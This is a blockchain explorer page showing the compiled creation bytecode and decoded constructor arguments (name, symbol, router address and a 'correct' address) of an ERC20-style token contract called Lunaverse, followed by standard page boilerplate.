a00000000000000000000000000000000000000000000000000000000081526004016103ec9061110d565b60405180910390fd5b610400848484610a8d565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161045d9190610ebc565b60405180910390a36104f7843384600a60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f2919061115c565b6108f2565b90509392505050565b6000600960009054906101000a900460ff1660ff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610591610c17565b73ffffffffffffffffffffffffffffffffffffffff166105af610611565b73ffffffffffffffffffffffffffffffffffffffff1614610605576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105fc906111dc565b60405180910390fd5b61060f6000610c1f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546106499061106a565b80601f01602080910402602001604051908101604052809291908181526020018280546106759061106a565b80156106c25780601f10610697576101008083540402835291602001916106c2565b820191906000526020600020905b8154815290600101906020018083116106a557829003601f168201915b5050505050905090565b60006106d9338484610a8d565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107369190610ebc565b60405180910390a36001905092915050565b60065481565b6000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107dd610c17565b73ffffffffffffffffffffffffffffffffffffffff166107fb610611565b73ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610848906111dc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061126e565b60405180910390fd5b6108c981610c1f565b50565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561095d5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b61099c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099390611300565b60405180910390fd5b81600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610a7a9190610ebc565b60405180910390a3600190509392505050565b6000600654606483610a9f919061134f565b610aa99190611380565b90508082610ab7919061115c565b915080600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b08919061115c565b9250508190555080600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b5e91906113da565b9250508190555081600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bb4919061115c565b9250508190555081600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c0a91906113da565b9250508190555050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d1d578082015181840152602081019050610d02565b83811115610d2c576000848401525b50505050565b6000601f19601f8301169050919050565b6000610d4e82610ce3565b610d588185610cee565b9350610d68818560208601610cff565b610d7181610d32565b840191505092915050565b60006020820190508181036000830152610d968184610d43565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610dce82610da3565b9050919050565b610dde81610dc3565b8114610de957600080fd5b50565b600081359050610dfb81610dd5565b92915050565b6000819050919050565b610e1481610e01565b8114610e1f57600080fd5b50565b600081359050610e3181610e0b565b92915050565b60008060408385031215610e4e57610e4d610d9e565b5b6000610e5c85828601610dec565b9250506020610e6d85828601610e22565b9150509250929050565b60008115159050919050565b610e8c81610e77565b82525050565b6000602082019050610ea76000830184610e83565b92915050565b610eb681610e01565b82525050565b6000602082019050610ed16000830184610ead565b92915050565b600080600060608486031215610ef057610eef610d9e565b5b6000610efe86828701610dec565b9350506020610f0f86828701610dec565b9250506040610f2086828701610e22565b9150509250925092565b610f3381610dc3565b82525050565b6000602082019050610f4e6000830184610f2a565b92915050565b600060208284031215610f6a57610f69610d9e565b5b6000610f7884828501610dec565b91505092915050565b60008060408385031215610f9857610f97610d9e565b5b6000610fa685828601610dec565b9250506020610fb785828601610dec565b9150509250929050565b6000819050919050565b6000610fe6610fe1610fdc84610da3565b610fc1565b610da3565b9050919050565b6000610ff882610fcb565b9050919050565b600061100a82610fed565b9050919050565b61101a81610fff565b82525050565b60006020820190506110356000830184611011565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061108257607f821691505b6020821081036110955761109461103b565b5b50919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006110f7602983610cee565b91506111028261109b565b604082019050919050565b60006020820190508181036000830152611126816110ea565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061116782610e01565b915061117283610e01565b9250828210156111855761118461112d565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006111c6602083610cee565b91506111d182611190565b602082019050919050565b600060208201905081810360008301526111f5816111b9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611258602683610cee565b9150611263826111fc565b604082019050919050565b600060208201905081810360008301526112878161124b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006112ea602483610cee565b91506112f58261128e565b604082019050919050565b60006020820190508181036000830152611319816112dd565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061135a82610e01565b915061136583610e01565b92508261137557611374611320565b5b828204905092915050565b600061138b82610e01565b915061139683610e01565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156113cf576113ce61112d565b5b828202905092915050565b60006113e582610e01565b91506113f083610e01565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114255761142461112d565b5b82820190509291505056fea2646970667358221220bb4c20f08a05ff3d00af65790cea310ade3638ebd56946434e54a5f74cce47d564736f6c634300080e0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000002be915829dbb43c27ccfd2ae040c45bff2feb6b000000000000000000000000000000000000000000000000000000000000000094c756e617665727365000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094c756e6176657273650000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : _NAME (string): Lunaverse
Arg [1] : _SYMBOL (string): Lunaverse
Arg [2] : routerAddress (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [3] : correct (address): 0x2Be915829DBb43C27ccFD2AE040C45bFF2feb6b0

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [3] : 0000000000000000000000002be915829dbb43c27ccfd2ae040c45bff2feb6b0
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [5] : 4c756e6176657273650000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [7] : 4c756e6176657273650000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.